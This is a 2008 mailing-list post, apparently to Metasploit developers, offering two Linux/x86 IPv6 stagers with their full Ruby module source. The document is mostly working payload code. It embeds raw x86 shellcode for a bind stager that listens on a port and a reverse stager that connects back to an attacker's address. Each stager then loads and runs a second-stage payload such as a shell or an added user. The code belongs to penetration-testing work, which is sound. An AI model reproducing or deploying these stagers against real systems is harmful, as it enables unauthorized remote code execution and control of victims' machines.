-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey everyone,
I've attached a couple of IPv6 stagers for Linux/x86: bind_ipv6_tcp and reverse_ipv6_tcp. They work great for me with the different payloads offered for Linux/x86 (shell, adduser, chmod, etc). They differ from their non-IPv6 brethren in the same way HD describes the use of the Windows IPv6 stagers[1]. They should be straightforward, but please try them out and lemme know if you have any issues. I'd like to commit them before 3.2 is released, but I'd like a little more testing since it's getting somewhat close :) Thanks, Kris Katterjohn [1] http://spool.metasploit.com/pipermail/framework/2008-August/003636.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSSEsn/9K37xXYl36AQIlnQ/8ChH06D2aiABOU/brmXruNvK/tmbyRF47 mqln0xIgpKxwNxr/lS082Dgj7KdcH+4YANceSaKHwwWf9Go1N2VSe9mUS8fOh8zM 2LJtrLUbdnLoZJXic+fBDej7ggjWHRwKOqYqzB7GzHkK1JKjN//n6MK0p0bU+CIh SI0LiW5vD6Mrz2qvmHwm1rn1PNJb3/Xf5FS5+3Uv6Ia6/1QjOy5BOd+vgJQDR7nM eAHzXX6UC5crLmTnS1bZrjW/kM8uUtrDdLhSzLFCWJ3Ks+VbOHB1dJZsypmYl75U seDaFlojzMkwDhNP/cc1divLujbMHFYxfmVyvxP/6UWYdTLxd8tIGIH1wnpLQpzz pA7KePCMKEqc+ooxwTbvpyCArtqbP1xMSqqJVcHvf/sePz5Qc06alH8QTZl4V3c7 zITssP62kMJ9JMlJbBY+tpJPDVA8AbbOnTd9rnbIy/0dOpAvWDsnnMg4ZI17hFV3 264OF7cbyW7QK9EIvlWc7g9RGxz7zMbshdgqbEsgB/Jfjfz4wu3IPuirjH1/cX1+ SzCZP6k7CKLnsgZfZTPLGBYyN+bpHljm+r/Ps9T9lal9NKLryZ+BdA+x06PKYZ88 khbTSpfgJz3inyUcwGy3wty/tIfn+tltCSyhuNDahv2CWE0dkZ5wNkhohKzhMnzE 3taVk4hKYsE= =7JOp -----END PGP SIGNATURE-----
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'

# Linux Bind TCP/IPv6 Stager
#
# Declares the x86 stub together with the single value the framework
# patches into it before use (the listening port). No address placeholder
# is declared for this stager.
module Metasploit3

  include Msf::Payload::Stager
  include Msf::Payload::Linux

  class << self
    # Alias under which the framework resolves this stager's handler type.
    def handler_type_alias
      "bind_ipv6_tcp"
    end
  end

  # Register the stager description with the framework.
  #
  # 'Offsets' maps each patchable name to [byte offset, pack format]:
  # LPORT lands at byte 0x18 of 'Payload', packed with 'n' (16-bit,
  # big-endian / network order).
  #
  # @param info [Hash] module info supplied by the framework, merged with
  #   the values declared here
  def initialize(info = {})
    stub =
      "\x31\xdb\x53\x43\x53\x6a\x0a\x89\xe1\x6a\x66\x58\xcd\x80\x96" \
      "\x99\x52\x52\x52\x52\x52\x52\x66\x68\xbf\xbf\x66\x68\x0a\x00" \
      "\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\xb0" \
      "\x66\xb3\x04\xcd\x80\x52\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80" \
      "\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"

    details = {
      'Name'        => 'Bind TCP Stager (IPv6)',
      'Version'     => '$Revision$',
      'Description' => 'Listen for a connection over IPv6',
      'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_X86,
      'Handler'     => Msf::Handler::BindTcp,
      'Stager'      => {
        'Offsets' => { 'LPORT' => [ 0x18, 'n' ] },
        'Payload' => stub
      }
    }

    super(merge_info(info, details))
  end

end
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##

require 'msf/core'
require 'msf/core/handler/reverse_tcp'

# Linux Reverse TCP/IPv6 Stager
#
# Declares the x86 stub and the three values patched into it: the
# connect-back port, the optional IPv6 scope ID, and the 16-byte address.
# The address is too wide for the framework's normal pack-based
# substitution, so it is handled by the replace_var hook below.
module Metasploit3

  include Msf::Payload::Stager
  include Msf::Payload::Linux

  class << self
    # Alias under which the framework resolves this stager's handler type.
    def handler_type_alias
      "reverse_ipv6_tcp"
    end
  end

  # Register the stager description and its options.
  #
  # 'Offsets' maps each patchable name to [byte offset, pack format]:
  #   LPORT   at 0x2c, 'n' (16-bit big-endian / network order)
  #   SCOPEID at 0x11, 'V' (32-bit little-endian)
  #   ADDR    at 0x15, 'foo' -- a dummy format; ADDR is written by
  #           replace_var below, which covers the four 0xdeadbeef
  #           placeholder dwords that follow that offset in 'Payload'.
  #
  # SCOPEID is declared optional (required flag false); it is only
  # meaningful for link-local addresses.
  #
  # @param info [Hash] module info supplied by the framework, merged with
  #   the values declared here
  def initialize(info = {})
    stub =
      "\x31\xdb\x53\x43\x53\x6a\x0a\x89\xe1\x6a\x66\x58\xcd\x80\x96\x99" \
      "\x68\x00\x00\x00\x00\x68\xde\xad\xbe\xef\x68\xde\xad\xbe\xef\x68" \
      "\xde\xad\xbe\xef\x68\xde\xad\xbe\xef\x52\x66\x68\xbf\xbf\x66\x68" \
      "\x0a\x00\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd" \
      "\x80\x89\xf3\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1"

    details = {
      'Name'        => 'Reverse TCP Stager (IPv6)',
      'Version'     => '$Revision$',
      'Description' => 'Connect back to attacker over IPv6',
      'Author'      => 'Kris Katterjohn <[EMAIL PROTECTED]>',
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_X86,
      'Handler'     => Msf::Handler::ReverseTcp,
      'Stager'      => {
        'Offsets' => {
          'ADDR'    => [ 0x15, 'foo' ],
          'LPORT'   => [ 0x2c, 'n' ],
          'SCOPEID' => [ 0x11, 'V' ]
        },
        'Payload' => stub
      }
    }

    super(merge_info(info, details))

    register_options([
      OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses"])
    ])
  end

  # Substitution hook for the 'ADDR' placeholder.
  #
  # For any name other than 'ADDR' this returns false so the framework's
  # default substitution handles it (presumably it skips its own pass when
  # this returns true -- confirm against Msf::Payload). For 'ADDR' the
  # 16-byte LHOST is rendered via the 'ADDR6' formatter, split into four
  # little-endian dwords, and each dword is turned into a push instruction.
  # The dwords are emitted in reverse order, matching the order the stub's
  # placeholder pushes expect (see the 0xdeadbeef sequence in 'Payload').
  #
  # @param raw    [String] the stager bytes, modified in place
  # @param name   [String] the placeholder being substituted
  # @param offset [Integer] byte offset of the placeholder within raw
  # @param pack   [String] pack format declared in 'Offsets' (unused here)
  # @return [Boolean] true when ADDR was written, false otherwise
  #
  # This isn't pretty, but then again neither are IPv6 addresses --Kris
  def replace_var(raw, name, offset, pack)
    return false if name != 'ADDR'

    # Let the framework render LHOST as a raw 16-byte IPv6 address.
    packed_addr = ""
    substitute_vars(packed_addr, { 'LHOST' => [ 0, 'ADDR6' ] })

    pushes = packed_addr.unpack('V*').reverse.map do |dword|
      Rex::Arch::X86.push_dword(dword)
    end.join

    raw[offset, pushes.length] = pushes
    true
  end

end